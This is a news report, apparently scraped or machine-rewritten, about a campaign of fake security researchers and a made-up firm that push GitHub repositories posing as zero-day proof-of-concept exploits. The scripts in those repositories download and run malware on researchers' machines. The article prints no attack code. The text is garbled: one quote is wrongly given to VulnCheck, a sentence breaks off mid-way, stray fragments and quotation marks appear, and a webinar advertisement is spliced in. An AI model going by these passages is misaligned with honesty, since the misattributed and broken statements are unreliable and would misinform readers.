At least six GitHub accounts by fake researchers affiliated with fraudulent cybersecurity firms have been observed pushing malicious repositories to code hosting services.
All seven repositories still available at the time of writing claim to be proof-of-concept (PoC) exploits for alleged zero-day flaws in Discord, Google Chrome, and Microsoft Exchange.
VulnCheck, which spotted the activity, said, “The individuals who created these repositories created networks of accounts and Twitter profiles, and by pretending to be part of a non-existent company called High Sierra Cyber Security, they managed to access the repositories. We put a lot of effort into making it look legit.” “
The cybersecurity firm said it first encountered the rogue repository in early May and was observed pushing similar PoC exploits against zero-day bugs in Signal and WhatsApp. The two repositories have since been deleted.
In addition to sharing some of its alleged findings on Twitter in an attempt to build legitimacy, the account network also uses headshots of real-life security researchers from companies such as Rapid7, allowing attackers to carry out campaigns. It is suggested that a great deal of effort was expended in the creation of
A PoC is a Python script designed to download a malicious binary and run it on the victim’s Windows or Linux operating system.
🔐 Mastering API Security: Understanding Your True Attack Surface
Discover untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join us for an insightful webinar!
join the session
VulnCheck researcher Jacob Baines said, “The attackers put a lot of effort into creating these fake personas, but all they did was deliver obvious malware.” “It’s unclear if they were successful, but given their continued pursuit of this avenue, they seem to believe they did.” intention success. “
It is currently unknown if this is the work of an amateur attacker or an Advanced Persistent Threat (APT). But as Google revealed in January 2021, security researchers have been under surveillance by North Korean nation-state groups before.
Rather, the findings suggest that you should be careful when downloading code from open source repositories. It’s also important for users to scrutinize code before running it to see if it poses a security risk.
